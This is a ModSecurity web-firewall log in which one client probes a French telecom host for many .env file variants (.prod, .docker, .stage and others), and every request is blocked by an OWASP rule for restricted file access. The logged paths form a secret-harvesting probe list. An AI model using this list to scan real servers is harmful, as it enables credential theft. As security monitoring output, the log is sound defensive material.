[Mon May 11 15:50:04.217718 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.backup"] [unique_id "agHejKy-5-wpj6Sx56aiXgAAABc"]
[Mon May 11 15:50:04.312619 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHejKy-5-wpj6Sx56aiXwAAABc"]
[Mon May 11 15:50:04.313102 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHejKy-5-wpj6Sx56aiXwAAABc"]
[Mon May 11 15:50:04.313364 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.save"] [unique_id "agHejKy-5-wpj6Sx56aiXwAAABc"]
[Mon May 11 15:50:04.407402 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHejKy-5-wpj6Sx56aiYAAAABc"]
[Mon May 11 15:50:04.407870 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHejKy-5-wpj6Sx56aiYAAAABc"]
[Mon May 11 15:50:04.408092 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.old"] [unique_id "agHejKy-5-wpj6Sx56aiYAAAABc"]
[Mon May 11 15:50:04.502331 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.sample"] [unique_id "agHejKy-5-wpj6Sx56aiYQAAABc"]
[Mon May 11 15:50:04.502820 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.sample"] [unique_id "agHejKy-5-wpj6Sx56aiYQAAABc"]
[Mon May 11 15:50:04.503054 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.sample"] [unique_id "agHejKy-5-wpj6Sx56aiYQAAABc"]
[Mon May 11 15:50:04.599261 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agHejKy-5-wpj6Sx56aiYgAAABc"]
[Mon May 11 15:50:04.599734 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agHejKy-5-wpj6Sx56aiYgAAABc"]
[Mon May 11 15:50:04.599960 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.example"] [unique_id "agHejKy-5-wpj6Sx56aiYgAAABc"]
[Mon May 11 15:50:04.694482 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dev"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agHejKy-5-wpj6Sx56aiZAAAABc"]
[Mon May 11 15:50:04.694954 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agHejKy-5-wpj6Sx56aiZAAAABc"]
[Mon May 11 15:50:04.695193 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dev"] [unique_id "agHejKy-5-wpj6Sx56aiZAAAABc"]
[Mon May 11 15:50:04.789680 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.prod"] [unique_id "agHejKy-5-wpj6Sx56aiZQAAABc"]
[Mon May 11 15:50:04.790132 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.prod"] [unique_id "agHejKy-5-wpj6Sx56aiZQAAABc"]
[Mon May 11 15:50:04.790352 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.prod"] [unique_id "agHejKy-5-wpj6Sx56aiZQAAABc"]
[Mon May 11 15:50:04.884651 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.stage"] [unique_id "agHejKy-5-wpj6Sx56aiZgAAABc"]
[Mon May 11 15:50:04.885138 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.stage"] [unique_id "agHejKy-5-wpj6Sx56aiZgAAABc"]
[Mon May 11 15:50:04.885411 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.stage"] [unique_id "agHejKy-5-wpj6Sx56aiZgAAABc"]
[Mon May 11 15:50:04.980526 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.ci"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.ci"] [unique_id "agHejKy-5-wpj6Sx56aiZwAAABc"]
[Mon May 11 15:50:04.981006 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.ci"] [unique_id "agHejKy-5-wpj6Sx56aiZwAAABc"]
[Mon May 11 15:50:04.981239 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.ci"] [unique_id "agHejKy-5-wpj6Sx56aiZwAAABc"]
[Mon May 11 15:50:05.076910 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.docker"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker"] [unique_id "agHejay-5-wpj6Sx56aiaAAAABc"]
[Mon May 11 15:50:05.077399 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker"] [unique_id "agHejay-5-wpj6Sx56aiaAAAABc"]
[Mon May 11 15:50:05.077643 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.docker"] [unique_id "agHejay-5-wpj6Sx56aiaAAAABc"]
[Mon May 11 15:50:05.173147 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.live"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.live"] [unique_id "agHejay-5-wpj6Sx56aiaQAAABc"]
[Mon May 11 15:50:05.173628 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.live"] [unique_id "agHejay-5-wpj6Sx56aiaQAAABc"]
[Mon May 11 15:50:05.173845 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.live"] [unique_id "agHejay-5-wpj6Sx56aiaQAAABc"]
[Mon May 11 15:50:05.268575 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.preprod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.preprod"] [unique_id "agHejay-5-wpj6Sx56aiagAAABc"]
[Mon May 11 15:50:05.269041 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.preprod"] [unique_id "agHejay-5-wpj6Sx56aiagAAABc"]
[Mon May 11 15:50:05.269270 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.preprod"] [unique_id "agHejay-5-wpj6Sx56aiagAAABc"]
[Mon May 11 15:50:05.365125 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.uat"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.uat"] [unique_id "agHejay-5-wpj6Sx56aiawAAABc"]
[Mon May 11 15:50:05.365627 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.uat"] [unique_id "agHejay-5-wpj6Sx56aiawAAABc"]
[Mon May 11 15:50:05.365841 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.uat"] [unique_id "agHejay-5-wpj6Sx56aiawAAABc"]
[Mon May 11 15:50:05.459592 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.dist"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dist"] [unique_id "agHejay-5-wpj6Sx56aibQAAABc"]
[Mon May 11 15:50:05.459973 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dist"] [unique_id "agHejay-5-wpj6Sx56aibQAAABc"]
[Mon May 11 15:50:05.460196 2026] [security2:error] [pid 1319886:tid 1319936] [client 54.211.142.83:44366] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/.env.dist"] [unique_id "agHejay-5-wpj6Sx56aibQAAABc"]
